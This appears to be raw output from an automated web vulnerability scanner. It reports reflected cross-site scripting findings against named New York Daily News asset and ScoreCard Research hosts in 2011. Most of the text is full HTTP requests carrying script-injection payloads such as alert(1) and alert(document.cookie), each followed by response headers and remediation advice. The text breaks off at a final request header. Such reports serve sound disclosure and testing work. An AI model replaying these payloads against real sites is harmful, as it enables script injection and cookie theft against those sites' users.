Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/20101001/nydn_section.css50562'%3balert(1)//8959375d35d HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:39:54 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1212'%3balert(1)//7d7f91a6743 was submitted in the REST URL parameter 1. This input was echoed as e1212';alert(1)//7d7f91a6743 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /csse1212'%3balert(1)//7d7f91a6743/20101001/nydn_wrapper.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:50 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 451b8'%3balert(1)//09a243ac9e4 was submitted in the REST URL parameter 2. This input was echoed as 451b8';alert(1)//09a243ac9e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/20101001451b8'%3balert(1)//09a243ac9e4/nydn_wrapper.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:34 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74472'%3balert(1)//c53a03f00f was submitted in the REST URL parameter 3. This input was echoed as 74472';alert(1)//c53a03f00f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/20101001/nydn_wrapper.css74472'%3balert(1)//c53a03f00f HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:39:49 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45467'%3balert(1)//93ee1c912e9 was submitted in the REST URL parameter 1. This input was echoed as 45467';alert(1)//93ee1c912e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css45467'%3balert(1)//93ee1c912e9/thickbox.css HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:07 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84c91'%3balert(1)//d25f0f01566 was submitted in the REST URL parameter 2. This input was echoed as 84c91';alert(1)//d25f0f01566 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css/thickbox.css84c91'%3balert(1)//d25f0f01566 HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:39:21 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 685e9'%3balert(1)//22666baf37e was submitted in the REST URL parameter 1. This input was echoed as 685e9';alert(1)//22666baf37e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js685e9'%3balert(1)//22666baf37e/nydn-pack-20101001.js HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:37:45 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9c8c'%3balert(1)//d85129c0960 was submitted in the REST URL parameter 2. This input was echoed as b9c8c';alert(1)//d85129c0960 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/nydn-pack-20101001.jsb9c8c'%3balert(1)//d85129c0960 HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:38:36 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d74d'%3balert(1)//f26d587210b was submitted in the REST URL parameter 1. This input was echoed as 8d74d';alert(1)//f26d587210b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js8d74d'%3balert(1)//f26d587210b/thickbox.js HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:37:48 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2772'%3balert(1)//244e853bb28 was submitted in the REST URL parameter 2. This input was echoed as d2772';alert(1)//244e853bb28 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/thickbox.jsd2772'%3balert(1)//244e853bb28 HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:39:22 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c68c0'%3balert(1)//d1c46ff0b51 was submitted in the REST URL parameter 1. This input was echoed as c68c0';alert(1)//d1c46ff0b51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsc68c0'%3balert(1)//d1c46ff0b51/webtrends.js HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:37:48 GMT Server: Apache Content-Type: text/html Content-Language: en Cache-Control: private Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df507'%3balert(1)//1ee8507ef3e was submitted in the REST URL parameter 2. This input was echoed as df507';alert(1)//1ee8507ef3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/webtrends.jsdf507'%3balert(1)//1ee8507ef3e HTTP/1.1 Host: assets.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:39:22 GMT Server: Apache Content-Type: text/html Content-Language: en Connection: close
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3db19<script>alert(1)</script>af553f35587 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=83db19<script>alert(1)</script>af553f35587&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:28 GMT Date: Fri, 28 Jan 2011 16:37:28 GMT Connection: close Content-Length: 3593
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 6af11<script>alert(1)</script>c9e14de8521 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=31822366af11<script>alert(1)</script>c9e14de8521&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:29 GMT Date: Fri, 28 Jan 2011 16:37:29 GMT Connection: close Content-Length: 3593
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 6f583<script>alert(1)</script>358848f85ca was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=3182236&c15=6f583<script>alert(1)</script>358848f85ca HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:30 GMT Date: Fri, 28 Jan 2011 16:37:30 GMT Connection: close Content-Length: 3593
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 8fbbd<script>alert(1)</script>a4264343a60 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=61354048fbbd<script>alert(1)</script>a4264343a60&c3=15&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:28 GMT Date: Fri, 28 Jan 2011 16:37:28 GMT Connection: close Content-Length: 3593
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f9bd2<script>alert(1)</script>c18ecd985dc was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15f9bd2<script>alert(1)</script>c18ecd985dc&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:28 GMT Date: Fri, 28 Jan 2011 16:37:28 GMT Connection: close Content-Length: 3593
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4d59<script>alert(1)</script>5d1bee0e299 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477c4d59<script>alert(1)</script>5d1bee0e299&c5=&c6=&c10=3182236&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:29 GMT Date: Fri, 28 Jan 2011 16:37:29 GMT Connection: close Content-Length: 3593
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5e148<script>alert(1)</script>915272d1a71 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=5e148<script>alert(1)</script>915272d1a71&c6=&c10=3182236&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:29 GMT Date: Fri, 28 Jan 2011 16:37:29 GMT Connection: close Content-Length: 3593
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e262a<script>alert(1)</script>dc6ca0c95b2 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=e262a<script>alert(1)</script>dc6ca0c95b2&c10=3182236&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Fri, 04 Feb 2011 16:37:29 GMT Date: Fri, 28 Jan 2011 16:37:29 GMT Connection: close Content-Length: 3593
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c016f"><script>alert(1)</script>86f916feeee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:39:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 327 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b35e"><script>alert(1)</script>2e539209f83 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:40:07 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 327 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdced"><script>alert(1)</script>cd9f8b1c148 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:40:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 319 Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b07e"><script>alert(1)</script>4c5c59de13c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:22 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 366 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a83be"><script>alert(1)</script>51bef4a3ae4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 367 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd03"><script>alert(1)</script>7b8086e554f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:33 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 366 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b5f"><script>alert(1)</script>adf8fbdc8c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 367 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302ac"><script>alert(1)</script>aecd486426b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 366 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb20"><script>alert(1)</script>2288154c82a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:59:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 359 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1253d"><script>alert(1)</script>f83c851237 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
